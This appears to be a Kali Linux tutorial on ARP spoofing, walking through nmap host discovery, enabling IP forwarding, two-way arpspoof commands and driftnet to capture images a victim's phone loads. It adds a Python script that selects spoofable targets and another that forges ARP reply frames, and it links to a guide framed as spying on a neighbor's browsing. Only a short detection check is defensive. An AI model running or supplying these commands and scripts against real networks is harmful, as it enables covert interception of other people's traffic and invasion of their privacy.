On arpspoof spoofing and MITM (man-in-the-middle) testing

Preface:

Arpspoof (part of the dsniff suite) is a packet interception and forging tool used for spoofing inside a LAN. It is commonly used for the ARP "cut-off" attack that knocks a host off the network, or to hog bandwidth. Whether the victim is cut off or has its traffic silently relayed depends only on whether the attacking host forwards what it receives, which is what the ip_forward step below controls.

Driftnet is a simple, practical image-capture tool that pulls images out of network packets. It can capture from a live interface or offline from a pcap dump of the packets you specify, and it ships with Kali.

1. Use nmap to find the live hosts on the subnet

# nmap -sP 192.168.1.100/24

(-sP is the legacy spelling of -sn: host discovery only, no port scan. Any address in the range works as the argument; nmap scans the whole /24.)

Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-15 22:18 UTC

Nmap scan report for 192.168.1.1

Host is up (0.0089s latency).

MAC Address: D8:15:0D:EF:57:D6 (Tp-link Technologies)

Nmap scan report for 192.168.1.100

Host is up (0.0040s latency).

MAC Address: 8C:F2:28:AA:CE:23 (Shenzhen Mercury Communication Technologies)

Nmap scan report for 192.168.1.102

Host is up (0.032s latency).

MAC Address: 04:15:52:12:69:8F (Apple)

Nmap scan report for 192.168.1.104

Host is up (0.12s latency).

MAC Address: 60:F8:1D:8A:15:DB (Apple)

Nmap scan report for 192.168.1.111

Host is up (0.024s latency).

MAC Address: 50:7A:55:2A:33:15 (Apple)

Nmap scan report for 192.168.1.114

Host is up (0.23s latency).

MAC Address: 9C:99:A0:48:99:51 (Xiaomi Communications)

Nmap scan report for 192.168.1.116

Host is up (0.10s latency).

MAC Address: 54:E4:3A:E0:FA:78 (Apple)

Nmap scan report for 192.168.1.118

Host is up (0.017s latency).

MAC Address: 2A:F7:6A:40:4D:78 (Unknown)

Nmap scan report for 192.168.1.123

Host is up.

Nmap done: 256 IP addresses (9 hosts up) scanned in 6.07 seconds
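An added example, not from the original write-up: a parser for nmap's normal-format host-discovery output, with the scan above embedded verbatim as sample input, that turns it into a host list and picks the on-link hosts that could be ARP-spoofed. The exclusion rule (a host reported without a MAC line is the scanning machine itself, which nmap cannot time or fingerprint) is my reading of the output rather than something the page states; the vendor grouping is there to spot the phones among the other devices.

```python
import re

# Constructed sample input: the -sP output shown in the write-up, copied verbatim.
NMAP_OUTPUT = """\
Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-15 22:18 UTC
Nmap scan report for 192.168.1.1
Host is up (0.0089s latency).
MAC Address: D8:15:0D:EF:57:D6 (Tp-link Technologies)
Nmap scan report for 192.168.1.100
Host is up (0.0040s latency).
MAC Address: 8C:F2:28:AA:CE:23 (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.1.102
Host is up (0.032s latency).
MAC Address: 04:15:52:12:69:8F (Apple)
Nmap scan report for 192.168.1.104
Host is up (0.12s latency).
MAC Address: 60:F8:1D:8A:15:DB (Apple)
Nmap scan report for 192.168.1.111
Host is up (0.024s latency).
MAC Address: 50:7A:55:2A:33:15 (Apple)
Nmap scan report for 192.168.1.114
Host is up (0.23s latency).
MAC Address: 9C:99:A0:48:99:51 (Xiaomi Communications)
Nmap scan report for 192.168.1.116
Host is up (0.10s latency).
MAC Address: 54:E4:3A:E0:FA:78 (Apple)
Nmap scan report for 192.168.1.118
Host is up (0.017s latency).
MAC Address: 2A:F7:6A:40:4D:78 (Unknown)
Nmap scan report for 192.168.1.123
Host is up.
Nmap done: 256 IP addresses (9 hosts up) scanned in 6.07 seconds
"""

# "Nmap scan report for 192.168.1.1", or "Nmap scan report for name (192.168.1.1)" when reverse DNS resolves.
REPORT_RE = re.compile(r"^Nmap scan report for (?:(?P<name>\S+) \()?(?P<ip>\d+(?:\.\d+){3})\)?$")
UP_RE = re.compile(r"^Host is up(?: \((?P<latency>[\d.]+)s latency\))?\.$")
MAC_RE = re.compile(r"^MAC Address: (?P<mac>(?:[0-9A-F]{2}:){5}[0-9A-F]{2}) \((?P<vendor>.+)\)$")


def parse_ping_scan(text: str) -> list:
    """Turn nmap's human-readable host-discovery output into one dict per reported host."""
    hosts, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = REPORT_RE.match(line)
        if m:
            cur = {"ip": m["ip"], "name": m["name"], "up": False,
                   "latency_s": None, "mac": None, "vendor": None}
            hosts.append(cur)
            continue
        if cur is None:
            continue  # banner line before the first report
        m = UP_RE.match(line)
        if m:
            cur["up"] = True
            cur["latency_s"] = float(m["latency"]) if m["latency"] else None
            continue
        m = MAC_RE.match(line)
        if m:
            cur["mac"], cur["vendor"] = m["mac"], m["vendor"]
    return hosts


def spoofable_targets(hosts: list, gateway_ip: str) -> list:
    """Hosts worth poisoning: up, with a MAC (no MAC line means the scanner itself, which nmap
    cannot fingerprint and which makes no sense to spoof), and not the gateway they are paired with."""
    return [h for h in hosts if h["up"] and h["mac"] and h["ip"] != gateway_ip]


def vendor_counts(hosts: list) -> dict:
    """Live hosts per NIC vendor; the phones (Apple, Xiaomi) stand out from the routers."""
    counts = {}
    for h in hosts:
        if h["vendor"]:
            counts[h["vendor"]] = counts.get(h["vendor"], 0) + 1
    return counts


if __name__ == "__main__":
    hosts = parse_ping_scan(NMAP_OUTPUT)
    for h in spoofable_targets(hosts, "192.168.1.1"):
        print(f"{h['ip']:<16} {h['mac']}  {h['vendor']}")
```

Feed it the output of a fresh scan (nmap's normal output to a file, then read the file) rather than the embedded sample; the regexes accept the reverse-DNS form of the report line as well.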

2. Enable IP forwarding on the Kali box

# echo 1 > /proc/sys/net/ipv4/ip_forward

This needs root and does not survive a reboot (sysctl -w net.ipv4.ip_forward=1 is the equivalent). It is what turns the attack into a transparent man-in-the-middle: with forwarding off, the victim's packets stop at the Kali host and the victim simply loses connectivity, which is the ARP cut-off attack from the preface.

3. Find the phone's IP and start the ARP spoofing. Packets that host 192.168.1.106 sends to 192.168.1.1 now go to the Kali host first, which forwards them on. (192.168.1.106 does not appear in the scan above; re-run the scan right before spoofing, since phones join and leave Wi-Fi constantly.)

# arpspoof -i wlan0 -t 192.168.1.106 192.168.1.1

4. Do the same in the other direction, so the router's replies to 192.168.1.106 also go to the Kali host first and are forwarded from there.

# arpspoof -i wlan0 -t 192.168.1.1 192.168.1.106

Run each arpspoof in its own terminal; both keep re-sending forged replies until stopped, and on Ctrl-C they send correct replies to restore the two ARP caches. Without step 4 you only see the victim's outbound half of each connection. Newer dsniff builds also accept -r to poison both hosts from a single process.

5. Start driftnet to monitor. A window pops up; browse the web on the phone and the images the target is loading appear in it.

# driftnet -i wlan0

[Screenshot 2016-05-15-22-50-58: the driftnet window with captured images]

/tmp/driftnet-UIsrmU is where the images are saved by default (driftnet creates one such temporary directory per run, with a random suffix). Only images carried in plaintext HTTP can be seen; anything fetched over HTTPS passes through the Kali host encrypted and driftnet shows nothing for it.
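An added example, mine rather than the write-up's or the dsniff/driftnet projects' code: a Python model of what steps 2 to 4 do on the wire. It builds the forged ARP reply frames arpspoof sends in each direction, parses them back, applies them to a simulated copy of each host's ARP cache (which doubles as the check a defender runs: flag any IP whose MAC silently changes), and shows how the ip_forward setting from step 2 decides whether the victim's packets are relayed or dropped. The victim's and the Kali host's MACs are made-up placeholders; only the gateway MAC and the two IPs come from the page. Sending real frames needs a raw socket and root, which this deliberately leaves out.

```python
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2

# Addresses from the write-up (gateway, victim IP) plus two placeholder MACs the page never shows
# (locally-administered addresses, so they cannot collide with a real vendor OUI).
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "d8:15:0d:ef:57:d6"
VICTIM_IP, VICTIM_MAC = "192.168.1.106", "02:00:00:00:01:06"   # hypothetical victim MAC
ATTACKER_MAC = "02:00:00:00:01:23"                              # hypothetical: the Kali host (.123)


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(spoofed_ip: str, attacker_mac: str, target_ip: str, target_mac: str) -> bytes:
    """Forge the unsolicited reply arpspoof sends: "<spoofed_ip> is-at <attacker_mac>", unicast to
    the target so only that one cache is poisoned. 14-byte Ethernet header + 28-byte ARP body."""
    eth = mac_bytes(target_mac) + mac_bytes(attacker_mac) + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # Ethernet, IPv4, hlen, plen, opcode
           + mac_bytes(attacker_mac) + socket.inet_aton(spoofed_ip)
           + mac_bytes(target_mac) + socket.inet_aton(target_ip))
    return eth + arp


def parse_arp(frame: bytes):
    """Return the ARP fields of an Ethernet frame, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": op,
            "sender_mac": mac_str(frame[22:28]), "sender_ip": socket.inet_ntoa(frame[28:32]),
            "target_mac": mac_str(frame[32:38]), "target_ip": socket.inet_ntoa(frame[38:42])}


class ArpCache:
    """One host's IP->MAC table, updated the way a trusting stack does (any reply overwrites),
    plus the detection check a defender wants: record every time a known IP changes MAC."""

    def __init__(self, seed: dict):
        self.table = dict(seed)
        self.alerts = []

    def learn(self, frame: bytes) -> None:
        arp = parse_arp(frame)
        if arp is None or arp["op"] != ARP_REPLY:
            return
        old = self.table.get(arp["sender_ip"])
        if old is not None and old != arp["sender_mac"]:
            self.alerts.append(f"{arp['sender_ip']} moved {old} -> {arp['sender_mac']}")
        self.table[arp["sender_ip"]] = arp["sender_mac"]


def poison(victim: ArpCache, gateway: ArpCache) -> None:
    """Steps 3 and 4: one forged reply per direction (arpspoof keeps re-sending them every
    couple of seconds so the poisoned entries never age out)."""
    victim.learn(build_arp_reply(GATEWAY_IP, ATTACKER_MAC, VICTIM_IP, VICTIM_MAC))    # step 3
    gateway.learn(build_arp_reply(VICTIM_IP, ATTACKER_MAC, GATEWAY_IP, GATEWAY_MAC))  # step 4


def path_to_internet(victim: ArpCache, ip_forward: bool) -> list:
    """MACs a victim packet for an off-link address visits. The victim hands it to whatever its
    cache says the gateway is; if that is the attacker, step 2's ip_forward decides whether the
    packet is relayed to the real gateway (MITM) or dropped (the ARP cut-off from the preface)."""
    next_hop = victim.table[GATEWAY_IP]
    if next_hop != ATTACKER_MAC:
        return [VICTIM_MAC, next_hop]
    return [VICTIM_MAC, ATTACKER_MAC] + ([GATEWAY_MAC] if ip_forward else [])


if __name__ == "__main__":
    victim = ArpCache({GATEWAY_IP: GATEWAY_MAC})
    gateway = ArpCache({VICTIM_IP: VICTIM_MAC})
    poison(victim, gateway)
    print("victim thinks the gateway is", victim.table[GATEWAY_IP])
    print("alerts raised on the victim:", victim.alerts)
    print("with ip_forward=1:", path_to_internet(victim, True))
    print("with ip_forward=0:", path_to_internet(victim, False))
```

The alert list is the defensive half: static ARP entries for the gateway, or a monitor that compares observed replies against a known table the way ArpCache.learn does, catches this attack on the first forged reply.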

# driftnet -h    shows driftnet's options

driftnet, version 1.1.5
Capture images from network traffic and display them in an X window.

Synopsis: driftnet [options] [filter code]

Options:

  -h               Display this help message.
  -v               Verbose operation.
  -b               Beep when a new image is captured.
  -i interface     Select the interface on which to listen (default: all interfaces).
  -f file          Instead of listening on an interface, read captured packets from a pcap dump file; file can be a named pipe for use with Kismet or similar.
  -p               Do not put the listening interface into promiscuous mode.
  -a               Adjunct mode: do not display images on screen, but save them to a temporary directory and announce their names on standard output.
  -m number        Maximum number of images to keep in temporary directory in adjunct mode.
  -d directory     Use the named temporary directory.
  -x prefix        Prefix to use when saving images.
  -s               Attempt to extract streamed audio data from the network, in addition to images. At present this supports MPEG data only.
  -S               Extract streamed audio but not images.
  -M command       Use the given command to play MPEG audio data extracted with the -s option; this should process MPEG frames supplied on standard input. Default: `mpg123 -'.

The trailing filter code is an ordinary pcap filter expression (for example, host followed by the phone's IP), which limits the display to the traffic of the one poisoned host instead of everything passing through wlan0.

A line like the following in driftnet's output is normal:

Sun May 15 22:21:36 2016 [driftnet]
warning: image data too small (49 bytes) to bother with

It means one captured image (here 49 bytes) was below driftnet's minimum size and was discarded; the 49 is the size of that particular image, not a threshold.

For more, see: http://null-byte.wonderhowto.com/how-to/hack-like-pro-use-driftnet-see-what-kind-images-your-neighbor-looks-online-0154253/

